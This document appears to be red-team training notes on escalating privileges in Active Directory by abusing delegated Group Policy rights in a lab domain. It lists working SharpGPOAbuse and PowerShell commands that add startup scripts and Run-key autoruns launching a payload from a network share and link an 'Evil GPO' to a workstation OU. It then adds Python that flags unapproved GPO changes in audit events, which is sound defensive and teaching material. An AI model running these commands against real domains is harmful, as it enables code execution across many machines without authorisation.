Group Policy

Group Policy is the central repository in a forest or domain that controls the configuration of computers and users. Group Policy Objects (GPOs) are sets of configurations that are applied to Organisational Units (OUs). By default, only Domain Admins can create GPOs and link them to OUs, but it's common practice to delegate those rights to other teams. This delegation is typically assigned to domain groups - for example, a "Workstation Admins" group may have rights to manage GPOs that apply to a "Workstation" OU. Such delegation can create privilege escalation opportunities by allowing users to apply malicious GPOs to domain admin users or their computers.

- Modify Existing GPO

Modifying an existing GPO that is already applied to one or more OUs is the most straightforward scenario.

Once we have located such GPOs (PowerView/GPO), we can modify one without the use of GPMC (Group Policy Management Console) by editing the associated files directly in SYSVOL (the gpcFileSysPath):

ls \\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{5059FAC1-5E94-4361-95D3-3BB235A23928}

We can do that manually or use an automated tool such as SharpGPOAbuse (https://github.com/FSecureLABS/SharpGPOAbuse), which has several abuses built into it.

To put a startup script in SYSVOL that will be executed each time an affected computer starts:

execute-assembly C:\Tools\SharpGPOAbuse\SharpGPOAbuse\bin\Release\SharpGPOAbuse.exe --AddComputerScript --ScriptName startup.bat --ScriptContents "start /b \\dc-2\software\dns_x64.exe" --GPOName "Vulnerable GPO"

First, we need to search for principals that can create new GPOs in the domain (PowerView/GPO). Being able to create a GPO doesn't achieve anything unless it can be linked to an OU, so we will also search for principals that can link GPOs to an OU (PowerView/GPO).

Then, to manage GPOs from the command line we will use the PowerShell RSAT modules. These are an optional install and so are usually only found on management workstations. To see if they are present:

powershell Get-Module -List -Name GroupPolicy | select -expand ExportedCommands

If they are, to create and link a new GPO:

powershell New-GPO -Name "Evil GPO"

Then, for example, to add an HKLM autorun key to the registry (HKLM autoruns require a reboot to execute):

powershell Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "C:\Windows\System32\cmd.exe /c \\dc-2\software\dns_x64.exe" -Type ExpandString

Next, apply the GPO to the target OU:

powershell Get-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=dev,DC=cyberbotic,DC=io"
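
On the detection side, both scenarios above leave directory change events behind when Directory Service Changes auditing is enabled. The following is an added example, not part of the original notes: it triages exported Security events 5137 and 5136 for GPO creation, gPLink changes and GPO version bumps made by accounts outside an allowlist. The allowlist, the account names and the sample records are constructed assumptions.

```python
# Added example: triage of exported Security events for GPO changes.
# 5137 = directory object created, 5136 = directory object modified.
# Both need "Audit Directory Service Changes" plus SACLs on the objects.
# Edits made only to files in SYSVOL do not raise these events.

VALUE_ADDED = "%%14674"  # OperationType of 5136 when a value is written
APPROVED = {"dev\\gpo-admin"}  # assumption: lowercase accounts expected to manage GPOs

def classify(ev):
    """Return a label for a GPO-relevant change, or None."""
    eid = ev.get("EventID")
    cls = ev.get("ObjectClass", "").lower()
    attr = ev.get("AttributeLDAPDisplayName", "").lower()
    if eid == 5137 and cls == "grouppolicycontainer":
        return "gpo-created"
    if eid == 5136 and ev.get("OperationType") == VALUE_ADDED:
        if attr == "gplink":
            return "gpo-link-changed"
        if cls == "grouppolicycontainer" and attr == "versionnumber":
            return "gpo-settings-changed"
    return None

def find_unapproved_changes(events, approved=APPROVED):
    """List (label, actor, object DN) for changes by unapproved accounts."""
    findings = []
    for ev in events:
        label = classify(ev)
        actor = f"{ev.get('SubjectDomainName', '')}\\{ev.get('SubjectUserName', '')}"
        if label and actor.lower() not in approved:
            findings.append((label, actor, ev.get("ObjectDN", "")))
    return findings

DOMAIN_DN = "DC=dev,DC=cyberbotic,DC=io"
GPO_DN = "CN={CONSTRUCTED-GUID},CN=Policies,CN=System," + DOMAIN_DN

def _ev(eid, user, dn, cls, attr="", op=""):
    return {"EventID": eid, "SubjectDomainName": "DEV", "SubjectUserName": user,
            "ObjectDN": dn, "ObjectClass": cls,
            "AttributeLDAPDisplayName": attr, "OperationType": op}

# Constructed sample records, not taken from a real log.
SAMPLE_EVENTS = [
    _ev(5137, "jdoe", GPO_DN, "groupPolicyContainer"),
    _ev(5136, "jdoe", "OU=Workstations," + DOMAIN_DN, "organizationalUnit", "gPLink", VALUE_ADDED),
    _ev(5136, "jdoe", GPO_DN, "groupPolicyContainer", "versionNumber", "%%14675"),
    _ev(5136, "jdoe", GPO_DN, "groupPolicyContainer", "versionNumber", VALUE_ADDED),
    _ev(5136, "gpo-admin", GPO_DN, "groupPolicyContainer", "versionNumber", VALUE_ADDED),
    _ev(5136, "jdoe", "CN=jdoe,CN=Users," + DOMAIN_DN, "user", "description", VALUE_ADDED),
]
```

Only the "value added" half of each 5136 pair is counted, so one attribute write yields one finding rather than two.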
